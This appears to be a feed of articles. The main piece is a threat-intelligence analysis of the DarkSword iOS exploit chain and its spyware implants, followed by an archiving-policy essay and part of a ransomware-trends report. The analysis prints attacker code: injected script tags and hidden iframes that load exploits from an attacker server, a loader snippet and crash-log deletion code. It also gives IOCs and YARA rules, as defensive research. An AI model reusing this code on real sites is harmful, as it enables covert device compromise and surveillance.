    _0x5f5a7d.style.width = 0x0;
    _0x5f5a7d.style.border = 'none';
    document.body.appendChild(_0x5f5a7d);
  })();
} else {
  top.location.href = "<legit website>";
  window.location.href = '<legit website>';
}

Figure 13: Deobfuscated landing page snippet to fetch the DarkSword loader (PARS Defense, January 2026)

GHOSTSABER

GHOSTSABER is a JavaScript backdoor used by PARS Defense that communicates with its C2 server over HTTP(S). Its capabilities include device and account enumeration, file listing, data exfiltration, and the execution of arbitrary JavaScript code; a complete list of its supported commands is detailed in Table 1. Observed GHOSTSABER samples contain references to several commands that lack the necessary code to be executed, including some that purport to record audio from the device's microphone and send the device's current geolocation to the C2 server. These commands use a function called send_command_to_upper_process, which writes to a shared memory region that is otherwise unused in the implant. We suspect that a follow-on binary module may be downloaded from the C2 server to implement these commands at runtime.

Command

Description

ChangeStatusCheckSleepInterval

Changes the sleep duration between C2 check-ins

SendDeviceInfo

Uploads basic device information to the C2 server

SendUserAccountsList

Uploads a list of the signed-in accounts on the device to the C2 server

SendAppList

Uploads a list of the installed applications to the C2 server

SendCurrentLocation

Not directly implemented

ExecuteSqliteQuery

Executes an arbitrary SQL query against an arbitrary SQLite database and uploads the results to the C2 server

UnwrapKey

No-op

SendScreenshot

Not directly implemented

SendWiFiInfo

Not directly implemented

SendThumbnails

Uploads thumbnails from iOS' Photos app within a specified time period to the C2 server

SendApp

Uploads all of the files for a specified installed application to the C2 server

RecordAudio

Not directly implemented

SendFiles

Uploads a list of arbitrary files to the C2 server

SendRegEx

Uploads a list of files with paths matching a specified regex pattern to the C2 server

SendFileList

Uploads a recursive list of files and metadata in a specified directory to the C2 server

EvalJs

Executes an arbitrary JavaScript blob and uploads the output to the C2 server

Table 1: Commands supported by GHOSTSABER

New Ukrainian Watering Hole Activity From UNC6353

GTIG observed the suspected Russian espionage actor UNC6353 leveraging DarkSword in a new watering hole campaign targeting Ukrainian users. As mentioned in our recent blog post, we first began tracking UNC6353 in summer 2025 as a threat cluster conducting watering hole attacks on Ukrainian websites to deliver Coruna. This new activity, which has been active through March 2026 but dates back to at least December 2025, leverages the DarkSword exploit chain to deploy GHOSTBLADE. GTIG notified and collaborated with CERT-UA to mitigate this activity.

Compromised Ukrainian websites were updated to include a malicious script tag that fetched the first delivery stage from an UNC6353 server, static.cdncounter[.]net (Figure 14). This script (Figure 15) dynamically creates a new IFrame and sets its source to a file called index.html on the same server (Figure 16). While index.html bears some overlap with the landing page logic used by UNC6748 and PARS Defense, it sets the uid session storage key without checking the session's current state, and includes a Russian language comment that translates to "if uid is still needed, just install it."

Notably, the observed UNC6353 use of DarkSword only supported iOS 18.4-18.6. While earlier DarkSword use attributed to UNC6748 and PARS Defense also supported iOS 18.7, we did not observe that from UNC6353, despite their later operational timeline. However, the loader used in this version correctly loaded the RCE modules corresponding to the running iOS version, which we didn't observe in UNC6748's use of DarkSword with only iOS 18.4-18.6 support (Figure 17).

<script async src="https://static.cdncounter.net/widgets.js?uhfiu27fajf2948fjfefaa42"></script>

Figure 14: Malicious script tag used by UNC6353 (March 2026)

(function () {
  const iframe = document.createElement("iframe");
  iframe.src = "https://static.cdncounter.net/assets/index.html";
  iframe.style.width = "1px";
  iframe.style.height = "1px";
  iframe.style.border = "0";
  iframe.style.position = "absolute";
  iframe.style.left = "-9999px";
  iframe.style.opacity = "0.01";
  // важно для Safari
  iframe.setAttribute(
    "sandbox",
    "allow-scripts allow-same-origin"
  );
  document.body.appendChild(iframe);
})();

Figure 15: widgets.js (UNC6353, March 2026)

<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>Test Page</title>
</head>
<body>
  <script>
    // если uid всё ещё нужен — просто устанавливаем
    sessionStorage.setItem('uid', '1');
    const frame = document.createElement('iframe');
    frame.src = 'frame.html?' + Math.random();
    frame.style.width = '1px';
    frame.style.opacity = '0.01'
    frame.style.position = 'absolute';
    frame.style.left = '-9999px';
    frame.style.height = '1px';
    frame.style.border = 'none';
    document.body.appendChild(frame);
  </script>
</body>
</html>

Figure 16: index.html (UNC6353, March 2026)

let workerCode = "";
if(ios_version == '18,6' || ios_version == '18,6,1' || ios_version == '18,6,2')
    workerCode = getJS(`rce_worker_18.6.js?${Date.now()}`); // local version
else
    workerCode = getJS(`rce_worker_18.4.js?${Date.now()}`); // local version
let workerBlob = new Blob([workerCode],{type:'text/javascript'});
let workerBlobUrl = URL.createObjectURL(workerBlob);

Figure 17: rce_loader.js snippet for loading the RCE exploit workers (UNC6353, March 2026)

GHOSTBLADE

Following device infections from these watering holes, UNC6353 deployed a malware family GTIG tracks as GHOSTBLADE. GHOSTBLADE is a dataminer written in JavaScript that collects and exfiltrates a wide variety of data from a compromised device (Table 2). Data collected by GHOSTBLADE is exfiltrated to an attacker-controlled server over HTTP(S). Unlike GHOSTKNIFE and GHOSTSABER, GHOSTBLADE is less capable and does not support any additional modules or backdoor-like functionality; it also does not operate continuously. However, similar to GHOSTKNIFE, GHOSTBLADE also contains code to delete crash reports, but targets a different directory where they may be stored (Figure 18). The GHOSTBLADE sample observed in this activity had full debug logging present along with lots of comments in the code.

Notably, the GHOSTBLADE sample analyzed by GTIG contains a comment and code block conditionally executing code on iOS versions greater than or equal to 18.4, which is the minimum supported version by DarkSword (Figure 19; note that ver is parsed from uname, which returns the XNU version). This suggests the payload also supports running on versions lower than 18.4, which isn't supported by DarkSword.

Category

Collected Data

Communication and Messaging

iMessage database, Telegram data, WhatsApp data, mail indexes, call logs, contacts interaction data, contacts

Identity and Access

Device/account identifiers, signed in accounts, device keychains, SIM card info, device profiles

Location and Mobility

Location history, saved/known WiFi networks and passwords, Find My iPhone settings, location services settings

Personal Content and Media

Photos metadata, hidden photos, screenshots, iCloud Drive files, Notes database, Calendar database

Financials and Transactions

Cryptocurrency wallet data

Usage and Behavioral Data

Safari history/bookmarks/cookies, Health database, device personalization data

System and Connectivity

List of installed applications, Backup settings/info, cellular usage/data info, App Store preferences

Table 2: Data collected by GHOSTBLADE
static deleteCrashReports()
{
	this.getTokenForPath("/private/var/containers/Shared/SystemGroup/systemgroup.com.apple.osanalytics/DiagnosticReports/",true);
	libs_JSUtils_FileUtils__WEBPACK_IMPORTED_MODULE_0__["default"].deleteDir("/private/var/containers/Shared/SystemGroup/systemgroup.com.apple.osanalytics/DiagnosticReports/",true);
}

Figure 18: GHOSTBLADE code snippet used for deleting crash logs

// If iOS >= 18.4 we apply migbypass in order to bypass autobox restrictions
if (ver.major == 24 && ver.minor >= 4) {
	mutexPtr = BigInt(libs_Chain_Native__WEBPACK_IMPORTED_MODULE_0__["default"].callSymbol("malloc", 0x100));
	libs_Chain_Native__WEBPACK_IMPORTED_MODULE_0__["default"].callSymbol("pthread_mutex_init", mutexPtr, null);
	migFilterBypass = new MigFilterBypass(mutexPtr);
}

Figure 19: Code conditionally executed on iOS 18.4+ in GHOSTBLADE

DarkSword Exploit Chain

As mentioned, DarkSword uses six different vulnerabilities to fully compromise a vulnerable iOS device and run a final payload with full kernel privileges (Table 3). Unlike Coruna, DarkSword only supports a limited set of iOS versions (18.4-18.7), and while the different exploit stages are technically sophisticated, the mechanisms used for loading the exploits were more basic and less robust than Coruna.

Also unlike Coruna, DarkSword uses pure JavaScript for all stages of the exploit chain and final payloads. While more sophistication is required to bridge between JavaScript and the native APIs and IPC channels used in the exploit, its use eliminates the need to identify vulnerabilities for bypassing Page Protection Layer (PPL) or Secure Page Table Monitor (SPTM) exploit mitigations in iOS that prevent unsigned binary code from being executed.

Exploit Module

CVE

Description

Exploited as a Zero-Day

Patched in iOS Version(s)

rce_module.js

CVE-2025-31277

Memory corruption vulnerability in JavaScriptCore

No

18.6

rce_worker_18.4.js

CVE-2026-20700

User-mode Pointer Authentication Code (PAC) bypass in dyld

Yes

26.3

rce_worker_18.6.js

rce_worker_18.7.js

CVE-2025-43529

Memory corruption vulnerability in JavaScriptCore

Yes

18.7.3, 26.2

CVE-2026-20700

User-mode Pointer Authentication Code (PAC) bypass in dyld

Yes

26.3

sbox0_main_18.4.js

sbx0_main.js

CVE-2025-14174

Memory corruption vulnerability in ANGLE

Yes

18.7.3, 26.2

sbx1_main.js

CVE-2025-43510

Memory management vulnerability in the iOS kernel

No

18.7.2, 26.1

pe_main.js

CVE-2025-43520

Memory corruption vulnerability in the iOS kernel

No

18.7.2, 26.1

Table 3: Exploits used in DarkSword
DarkSword infection chain

Figure 20: DarkSword infection chain

Exploit Delivery

There are notable similarities and differences between the exploit delivery implementations used by UNC6748, PARS Defense, and UNC6353. We assess that each of the actors built their delivery mechanisms on a base set of logic from the DarkSword developers, and made tweaks to fit their own needs. All three actors had some usage of the uid session storage key, but not all in the same way:

  • We consistently saw UNC6748 landing pages both set the uid key, and check it before fetching the exploit loader.

    • UNC6748 only set the top.location.href property to redirect users if they weren't to be infected.

  • PARS Defense used the uid key in the same way in January 2026, but the initial activity we saw in November 2025 didn't include it.

    • Like UNC6748, PARS Defense set top.location.href, but also set window.location.href to the same value.

  • UNC6353 set the uid key, but did not check it before fetching the exploit loader; a comment in the source code suggests that they did not know if it was required by the subsequent stages.

Based on the actors' differing usages, we assess that this session storage check logic, along with the subsequent logic using frame.html to then fetch rce_loader.js as observed from UNC6748 and UNC6353, was developed by the DarkSword exploit chain developers. We assess that the additional fingerprinting logic used by PARS Defense in January 2026 and the anti-debug logic used by UNC6748 in November 2025 were likely written by those users to better meet their operational requirements.

Loader

All the activity we observed used effectively the same exploit loader, with some minor differences such as PARS Defense's addition of encryption. The loader manages Web Worker objects that are used by the two RCE exploits, along with state transitions throughout the RCE exploit lifecycle. The loader fetches two files for the RCE stages, named variations of rce_module.js and rce_worker.js (e.g. rce_worker_18.4.js). The iOS 18.4 exploit splits the logic between the Web Worker script and the main module, which is eval'd in the same context as the loader; the two different contexts communicate using postMessage as the RCE exploit progresses. The iOS 18.6/18.7 RCE exploit, however, contains all of the exploit logic in the worker, and the corresponding rce_module.js file just has an unused placeholder function (Figure 21).

The inconsistencies surrounding the correctness of fetching the RCE stages by the loader module are intriguing. One possibility is that the errors were manually corrected by UNC6353 and PARS Defense; alternatively, it is possible that UNC6748 received the exploit chain updates prior to the other users, and the DarkSword developers subsequently fixed those bugs.

// for displaying hex value
function dummyy(x) {
    return '0x' + x.toString(16);
}

Figure 21: rce_module_18.7.js contents (UNC6748, November 2025)

Remote Code Execution Exploits

GTIG observed two different JavaScriptCore (the JavaScript engine used in WebKit and Apple's Safari browser) vulnerabilities exploited for remote code execution by DarkSword. For devices running versions of iOS prior to 18.6, DarkSword uses CVE-2025-31277, a JIT optimization/type confusion bug which was patched by Apple in iOS 18.6. For devices running iOS 18.6-18.7, DarkSword uses CVE-2025-43529, a garbage collection bug in the Data Flow Graph (DFG) JIT layer of JavaScriptCore which was patched by Apple in iOS 18.7.3 and 26.2 after it was reported by GTIG. Both exploits develop their own fakeobj/addrof primitives, and then build arbitrary read/write primitives the same way on top of them.

Both vulnerabilities were directly chained with CVE-2026-20700, a bug in dyld used as a user-mode Pointer Authentication Codes (PAC) bypass to execute arbitrary code, as required by the subsequent exploit stages. This vulnerability was patched by Apple in iOS 26.3 after being reported by GTIG.

Sandbox Escape Exploits

Safari is designed to use multiple sandbox layers to isolate the different components of the browser where untrusted user input may be handled. DarkSword uses two separate sandbox escape vulnerabilities, first by pivoting out of the WebContent sandbox into the GPU process, and then by pivoting from the GPU process to mediaplaybackd. The same sandbox escape exploits were used regardless of which RCE exploit was needed.

WebContent Sandbox Escape

As previously discussed by Project Zero and others, Safari's renderer process (known as WebContent) is tightly sandboxed to limit the blast radius of any vulnerabilities it may contain, since it is the most accessible to untrusted user content. To bypass this, DarkSword fetches an exploit called sbox0_main_18.4.js or sbx0_main.js to break out of the WebContent sandbox. This exploit leverages CVE-2025-14174, a vulnerability in ANGLE where parameters were not sufficiently validated in a specific WebGL operation, leading to out-of-bounds memory operations in Safari's GPU process which the DarkSword developers use to execute arbitrary code within the GPU process.

This vulnerability was reported to Google (the developers of ANGLE) by Apple and GTIG, and was patched in Safari with the release of iOS 18.7.3 and 26.2.

GPU Sandbox Escape

In Safari, the GPU process has more privileges than the WebContent sandbox, but still is restricted from accessing much of the rest of the system. To bypass this limitation, DarkSword uses another sandbox escape exploit, sbx1_main.js, which leverages CVE-2025-43510, a memory management vulnerability in XNU. This is a copy-on-write bug which is exploited to build arbitrary function call primitives in mediaplaybackd, a system service with a larger set of permissions than the Safari GPU process where they can run the final exploit needed. They do this by loading a copy of the JavaScriptCore runtime into the mediaplaybackd process, and executing the next stage exploit within it.

This vulnerability was patched by Apple in iOS 18.7.2 and 26.1.

Local Privilege Escalation and Final Payload

Finally, the exploit loaded one last module, pe_main.js. This uses CVE-2025-43520, a kernel-mode race condition in XNU's virtual filesystem (VFS) implementation, which can be exploited to build physical and virtual memory read/write primitives. This vulnerability was patched by Apple in iOS 18.7.2 and 26.1.

The exploit contains a suite of library classes building on top of their primitives that are used by the different post-exploitation payloads, such as Native, which provides abstractions for manipulating raw memory and calling native functions, and FileUtils, which provides a POSIX-like filesystem API. Artifacts left behind from the Webpack process applied to the analyzed GHOSTBLADE sample included file paths that show the structure on disk of these libraries (Figure 22).

We assess that GHOSTBLADE was likely developed by the DarkSword developers, based on the consistency in coding styles and the tight integration between it and the library code, which is notably distinct from how GHOSTKNIFE and GHOSTSABER leveraged these libraries. We also observed additional modifications made to some of the post-exploitation payload libraries in the samples observed from PARS Defense, including additional raw memory buffer manipulation, likely used in follow-on binary modules. Additionally, the libraries in GHOSTBLADE contained a reference to a function called startSandworm() which was not implemented within it; we suspect this may be a codename for a different exploit.

src/InjectJS.js
src/libs/Chain/Chain.js
src/libs/Chain/Native.js
src/libs/Chain/OffsetsStruct.js
src/libs/Driver/Driver.js
src/libs/Driver/DriverNewThread.js
src/libs/Driver/Offsets.js
src/libs/Driver/OffsetsTable.js
src/libs/JSUtils/FileUtils.js
src/libs/JSUtils/Logger.js
src/libs/JSUtils/Utils.js
src/libs/TaskRop/Exception.js
src/libs/TaskRop/ExceptionMessageStruct.js
src/libs/TaskRop/ExceptionReplyStruct.js
src/libs/TaskRop/MachMsgHeaderStruct.js
src/libs/TaskRop/PAC.js
src/libs/TaskRop/PortRightInserter.js
src/libs/TaskRop/RegistersStruct.js
src/libs/TaskRop/RemoteCall.js
src/libs/TaskRop/Sandbox.js
src/libs/TaskRop/SelfTaskStruct.js
src/libs/TaskRop/Task.js
src/libs/TaskRop/TaskRop.js
src/libs/TaskRop/Thread.js
src/libs/TaskRop/ThreadState.js
src/libs/TaskRop/VM.js
src/libs/TaskRop/VmMapEntry.js
src/libs/TaskRop/VMObject.js
src/libs/TaskRop/VmPackingParams.js
src/libs/TaskRop/VMShmem.js
src/loader.js
src/main.js
src/MigFilterBypassThread.js

Figure 22: Filepath artifacts from GHOSTBLADE sample

Outlook and Implications

The use of both DarkSword and Coruna by a variety of actors demonstrates the ongoing risk of exploit proliferation across actors of varying geography and motivation. Google remains committed to aiding in the mitigation of this problem, in part through our ongoing participation in the Pall Mall Process, designed to build consensus and progress toward limiting the harms from the spyware industry. Together, we are focused on developing international norms and frameworks to limit the misuse of these powerful technologies and protect human rights around the world. These efforts are built on earlier governmental actions, including steps taken by the US Government to limit government use of spyware, and a first-of-its-kind international commitment to similar efforts.

Acknowledgments

We would like to acknowledge and thank Lookout, iVerify, Google Project-Zero, and Apple Security Engineering & Architecture team for their partnership throughout this investigation.

Indicators of Compromise (IOCs)

To assist the wider community in hunting and identifying activity outlined in this blog post, we have included indicators of compromise (IOCs) in a GTI Collection for registered users. We've also uploaded a sample of GHOSTBLADE to VirusTotal.

Network Indicators

IOC

Threat Actor

Context

snapshare[.]chat

UNC6748

DarkSword delivery used in Saudi Arabia

62.72.21[.]10

UNC6748

GHOSTKNIFE C2 server (November 2025)

72.60.98[.]48

UNC6748

GHOSTKNIFE C2 server (November 2025)

sahibndn[.]io

PARS Defense

DarkSword delivery used in Turkey

e5.malaymoil[.]com

PARS Defense

DarkSword delivery used in Malaysia

static.cdncounter[.]net

UNC6353

DarkSword delivery via watering holes in Ukraine

sqwas.shapelie[.]com

UNC6353

GHOSTBLADE exfiltration server

File Indicators

IOC

Threat Actor

Context

2e5a56beb63f21d9347310412ae6efb29fd3db2d3a3fc0798865a29a3c578d35

UNC6353

Extracted GHOSTBLADE sample

Detections

YARA Rules

rule G_Backdoor_GHOSTKNIFE_1 {
	meta:
		author = "Google Threat Intelligence Group (GTIG)"
	strings:
		$ = "server_pub_ex"
		$ = "client_pri_ds"
		$ = "getfilebyExtention"
		$ = "getContOfFilesForModule"
		$ = "carPlayConnectionState"
		$ = "saveRecordingApp"
		$ = "getLastItemBack"
		$ = "the inherted class"
		$ = "passExtetion"
	condition:
		filesize < 10MB and not (uint16be(0) == 0x504b or uint32be(0) == 0x6465780a or uint16be(0) == 0x4d5a or uint32be(0) == 0x377abcaf) and 4 of them
}
rule G_Backdoor_GHOSTSABER_1 {
	meta:
		author = "Google Threat Intelligence Group (GTIG)"
	strings:
		$ = "sendDeviceInfoJson"
		$ = "merge2AppLists"
		$ = "send_command_to_upper_process"
		$ = "ChangeStatusCheckSleepInterval"
		$ = "SendRegEx"
		$ = "evalJsResponse.json"
		$ = "sendSimpleUploadJsonObject"
		$ = "device_info_all"
		$ = "getPayloadForSimpleStatusRequest"
	condition:
		filesize < 10MB and not (uint16be(0) == 0x504b or uint32be(0) == 0x6465780a or uint16be(0) == 0x4d5a or uint32be(0) == 0x377abcaf) and 4 of them
}
rule G_Datamine_GHOSTBLADE_1 {
	meta:
		author = "Google Threat Intelligence Group (GTIG)"
	strings:
		$ = "/private/var/tmp/wifi_passwords.txt"
		$ = "/private/var/tmp/wifi_passwords_securityd.txt"
		$ = "/.com.apple.mobile_container_manager.metadata.plist" fullword
		$ = "X-Device-UUID: ${"
		$ = "/installed_apps.txt" fullword
		$ = "icloud_dump_" fullword
	condition:
		filesize < 10MB and not (uint16be(0) == 0x504b or uint32be(0) == 0x6465780a or uint16be(0) == 0x4d5a or uint32be(0) == 0x377abcaf) and 3 of them
}
rule G_Hunting_DarkSwordExploitChain_ImplantLib_FilePaths_1 {
	meta:
		author = "Google Threat Intelligence Group (GTIG)"
	strings:
		$ = "src/InjectJS.js"
		$ = "src/libs/Chain/Chain.js"
		$ = "src/libs/Chain/Native.js"
		$ = "src/libs/Chain/OffsetsStruct.js"
		$ = "src/libs/Driver/Driver.js"
		$ = "src/libs/Driver/DriverNewThread.js"
		$ = "src/libs/Driver/Offsets.js"
		$ = "src/libs/Driver/OffsetsTable.js"
		$ = "src/libs/JSUtils/FileUtils.js"
		$ = "src/libs/JSUtils/Logger.js"
		$ = "src/libs/JSUtils/Utils.js"
		$ = "src/libs/TaskRop/Exception.js"
		$ = "src/libs/TaskRop/ExceptionMessageStruct.js"
		$ = "src/libs/TaskRop/ExceptionReplyStruct.js"
		$ = "src/libs/TaskRop/MachMsgHeaderStruct.js"
		$ = "src/libs/TaskRop/PAC.js"
		$ = "src/libs/TaskRop/PortRightInserter.js"
		$ = "src/libs/TaskRop/RegistersStruct.js"
		$ = "src/libs/TaskRop/RemoteCall.js"
		$ = "src/libs/TaskRop/Sandbox.js"
		$ = "src/libs/TaskRop/SelfTaskStruct.js"
		$ = "src/libs/TaskRop/Task.js"
		$ = "src/libs/TaskRop/TaskRop.js"
		$ = "src/libs/TaskRop/Thread.js"
		$ = "src/libs/TaskRop/ThreadState.js"
		$ = "src/libs/TaskRop/VM.js"
		$ = "src/libs/TaskRop/VmMapEntry.js"
		$ = "src/libs/TaskRop/VMObject.js"
		$ = "src/libs/TaskRop/VmPackingParams.js"
		$ = "src/libs/TaskRop/VMShmem.js"
		$ = "src/MigFilterBypassThread.js"
	condition:
		any of them
}

Blocking the Internet Archive Won’t Stop AI, But It Will Erase the Web’s Historical Record

16 March 2026 at 20:26

Imagine a newspaper publisher announcing it will no longer allow libraries to keep copies of its paper. 

That’s effectively what’s begun happening online in the last few months. The Internet Archive—the world’s largest digital library—has preserved newspapers since it went online in the mid-1990s. The Archive’s mission is to preserve the web and make it accessible to the public. To that end, the organization operates the Wayback Machine, which now contains more than one trillion archived web pages and is used daily by journalists, researchers, and courts.

But in recent months The New York Times began blocking the Archive from crawling its website, using technical measures that go beyond the web’s traditional robots.txt rules. That risks cutting off a record that historians and journalists have relied on for decades. Other newspapers, including The Guardian, seem to be following suit. 

For nearly three decades, historians, journalists, and the public have relied on the Internet Archive to preserve news sites as they appeared online. Those archived pages are often the only reliable record of how stories were originally published. In many cases, articles get edited, changed, or removed—sometimes openly, sometimes not. The Internet Archive often becomes the only source for seeing those changes. When major publishers block the Archive’s crawlers, that historical record starts to disappear.

The Times says the move is driven by concerns about AI companies scraping news content. Publishers seek control over how their work is used, and several—including the Times—are now suing AI companies over whether training models on copyrighted material violates the law. There’s a strong case that such training is fair use

Whatever the outcome of those lawsuits, blocking nonprofit archivists is the wrong response. Organizations like the Internet Archive are not building commercial AI systems. They are preserving a record of our history. Turning off that preservation in an effort to control AI access could essentially torch decades of historical documentation over a fight that libraries like the Archive didn’t start, and didn’t ask for. 

If publishers shut the Archive out, they aren’t just limiting bots. They’re erasing the historical record. 

Archiving and Search Are Legal 

Making material searchable is a well-established fair use. Courts have long recognized it’s often impossible to build a searchable index without making copies of the underlying material. That’s why when Google copied entire books in order to make a searchable database, courts rightly recognized it as a clear fair use. The copying served a transformative purpose: enabling discovery, research, and new insights about creative works. 

The Internet Archive operates on the same principle. Just as physical libraries preserve newspapers for future readers, the Archive preserves the web’s historical record. Researchers and journalists rely on it every day. According to Archive staff, Wikipedia alone links to more than 2.6 million news articles preserved at the Archive, spanning 249 languages. And that’s only one example. Countless bloggers, researchers, and reporters depend on the Archive as a stable, authoritative record of what was published online.

The same legal principles that protect search engines must also protect archives and libraries. Even if courts place limits on AI training, the law protecting search and web archiving is already well established.

The Internet Archive has preserved the web’s historical record for nearly thirty years. If major publishers begin blocking that mission, future researchers may find that huge portions of that historical record have simply vanished. There are real disputes over AI training that must be resolved in courts. But sacrificing the public record to fight those battles would be a profound, and possibly irreversible, mistake. 

Ransomware Under Pressure: Tactics, Techniques, and Procedures in a Shifting Threat Landscape

16 March 2026 at 15:00

Written by: Bavi Sadayappan, Zach Riddle, Ioana Teaca, Kimberly Goody, Genevieve Stark


Introduction 

Since 2018, when many financially motivated threat actors began shifting their monetization strategy to post-compromise ransomware deployments, ransomware has become one of the most pervasive threats to organizations across almost every industry vertical and region. In recent years ransomware operations have evolved, creating a robust ecosystem that has lowered the barrier to entry via the commoditization and specialization of the supporting underground communities, which is exemplified by the proliferation of the ransomware-as-a-service (RaaS) business model. While ransomware remains a dominant threat due to the volume of activity and the potential for serious operational disruptions, we have observed multiple indicators that suggest the overall profitability of ransomware operations is in decline. This trend is likely the result of multiple factors, including improved cybersecurity practices, increased ability of organizations to recover, and declining ransom payment amounts and rates. Further, numerous disruptions have impacted the ransomware ecosystem in recent years, from external forces like law enforcement operations to internal conflict between actors; both have led to the disappearance or significant debilitation of previously prolific RaaS groups like LockBit, ALPHV, Basta, and RansomHub. However, despite these shakeups, the well-established Qilin and Akira RaaS brands rose up to fill the vacuum, leading to a record high number of victims posted to data leak sites (DLS) in 2025 (Figure 1).

This report provides an overview of the ransomware landscape and common tactics, techniques, and procedures (TTPs) directly observed in the 2025 ransomware incidents that Mandiant Consulting responded to. In this analysis, we excluded activity focused only on data theft extortion. Key insights include: 

  • In a third of incidents, the initial access vector was confirmed or suspected exploitation of vulnerabilities, most often in common VPNs and firewalls. 

  • 77 percent of analyzed ransomware intrusions included suspected data theft, a notable uptick from 57 percent of incidents in 2024.

  • In approximately 43% of ransomware intrusions we responded to in 2025, the threat actors were observed targeting virtualization infrastructure, an increase from 29% in 2024.

  • REDBIKE was the most frequently deployed ransomware family, accounting for 30 percent of analyzed ransomware incidents.

  • Several trends from prior years remained consistent, including a decreased use of certain intrusion tools like BEACON and MIMIKATZ and a plateau in the reliance of remote management tools.

Google Threat Intelligence Group (GTIG) analysis of TTPs relies primarily on data from Mandiant engagements and therefore represents only a sample of global ransomware intrusion activity. These incidents involved the post-compromise deployment of ransomware following network intrusion activity, with the majority of incidents also involving data theft extortion. The impacted organizations were based across the Asia Pacific region, Europe, North America, and South America and within nearly every industry sector. 

While we anticipate ransomware will remain one of the most impactful cyber threats in 2026, the reduction in profits may cause some threat actors to leverage other monetization methods and tactics, such as continuing targeting shifts, further increasing data theft extortion operations, the use of more aggressive extortion tactics, or opportunistically using access to victim environments for secondary monetization mechanisms. 

Recommendations to assist in addressing the threat posed by ransomware are captured in our white paper, Ransomware Protection and Containment Strategies: Practical Guidance for Endpoint Protection, Hardening, and Containment.

Top 10 DLS in 2025 and associated ransomware families

Figure 1: Top 10 DLS in 2025 and associated ransomware families

2025 Ransomware Landscape 

In 2025, the ransomware landscape became increasingly crowded, with a record high number of unique DLS with at least one post. The growing pool of ransomware actors engaging in extortion operations combined with persistent targeted efforts by law enforcement and enhanced organizational security has likely shrunk profit margins for ransomware operators in recent years. In response, threat actors appear to be adopting new strategies from who they target to the technologies they use. This evolution has included an apparent increase in targeting smaller organizations, and a possible focus on data theft extortion without ransomware deployment. Furthermore, threat actors are incorporating artificial intelligence (AI) into aspects of their operations (e.g., negotiations) and leveraging Web3 technologies to bolster the resilience of their infrastructure. While we see expansions in these aspects, internal and external disruptions seen in recent years have prompted some threat actors to become more cautious resulting in more rigorous vetting of potential partners. We expect ransomware actors to continue to adjust and evolve their tactics in an attempt to maintain some level of success or regain the levels of profitability they reached historically.

2025 marked a record year for the number of posts on DLS, with the total number of posts surpassing that of 2024 by almost 50%. Despite these record setting numbers, we caution against relying solely on DLS data to ascertain the overall volume of ransomware activity. Threat actors typically only create DLS posts for victims that have refused to initiate or complete extortion negotiations. Public reporting indicates that ransom payment rates have been declining, which could, at least partially, fuel the steady increase of posts on shaming sites. It can also be difficult to differentiate between DLS posts associated with data theft-only operations and those that also include ransomware deployment. For example, threat actors associated with the CL0P DLS continue to occasionally deploy ransomware but have shifted primarily to data-theft-extortion-only operations. So while CL0P was the third most prolific DLS in 2025, the vast majority of incidents associated with these posts did not involve ransomware. We have also observed numerous instances of threat actors, such as those associated with BABUK 2.0, fabricating and exaggerating claims as well as reposting claims that would at least slightly inflate victim counts. Finally, not all claims are of equal significance. For example, between December 2024 and January 2025, FUNKSEC was the highest volume DLS; however, many of the associated incidents appeared to be lower impact events involving compromising websites for data theft extortion.

Volume of posts and unique data leak sites from 2020 through 2025

Figure 2: Volume of posts and unique data leak sites from 2020 through 2025

Although ransomware has historically been highly lucrative, recent disruptions and enhanced organizational security may be impacting these profits. Public reporting indicates that both ransom payment rates and average ransom demands are decreasing. In February 2026, Coveware reported that ransom payment rates have generally decreased over the past few years, reaching a historic low in Q4 2025. Similarly, in June 2025, Sophos reported that the average ransom demand has dropped by one-third during the last year, to $1.34 million in 2025 from $2 million in 2024. Public reporting further suggests that organizations that have been impacted by ransomware are able to recover more easily, which also likely contributes to reduced ransom payments. For example, in February 2025, Unit 42 reported that companies have improved their ability to recover from ransomware incidents; nearly half of ransomware victims were able to restore from backup in 2024 compared to around 28% in 2023 and only 11% in 2022.

Improvements in organizational security and the growing ability of victims to recover from ransomware attacks may be leading some adversaries to view data theft as a more reliable method for securing payments. In intrusions investigated by Mandiant, we observed a decline in traditional ransomware deployment coinciding with a rise in data theft extortion. Further, some RaaS programs are providing data-theft-extortion-only options in addition to ransomware, which may reflect demand from their customer base. It is also plausible that more robust security posture, particularly at larger organizations, is forcing threat actors to adjust their targeting to focus on a higher volume of attacks targeting smaller organizations with less mature security programs. Analysis of organization size (based on estimated number of employees, when available) of victims posted on DLS indicates threat actors have shifted away from larger organizations and toward smaller organizations (Figure 3). Threat actors have directly commented on this trend. For example, in leaked April and May 2024 chats, a Basta actor theorized that targeting smaller company networks would be more effective compared to "normal networks."

Percentage of DLS posts for victims with an estimated company size of less than 200 employees

Figure 3: Percentage of DLS posts for victims with an estimated company size of less than 200 employees

During 2025, numerous disruptive events impacted the ransomware ecosystem, including both a range of law enforcement and government actions as well as threat actor-related data leaks and disputes, at least some of which appear to be the result of turmoil amongst threat actors (Figure 4). Not only did many of these events result in direct disruption such as arrests, seizures, and sanctions, but some also forced threat actors to shift TTPs and provided valuable insights to security researchers on the inner workings and individuals behind some ransomware operations. Yet the dominance of long-standing Qilin and Akira brands in 2025 demonstrate the resilience of ransomware actors and their ability to fill voids following takedowns and exit scams of competing RaaS operators. There are some indications that the overall instability in the ransomware threat landscape, coupled with pressure from law enforcement, have caused ransomware teams to increase their operational security, which has translated into more rigorous vetting of potential affiliates. We've also seen some private or semi-private offerings gain prominence. For example, 2025 marked the first time in four years that one of the top two most prolific RaaS operations was not public; while Akira appears to have affiliates, they do not have a public advertisement for their operations.

Key disruptive events impacting the ransomware landscape

Figure 4: Key disruptive events impacting the ransomware landscape

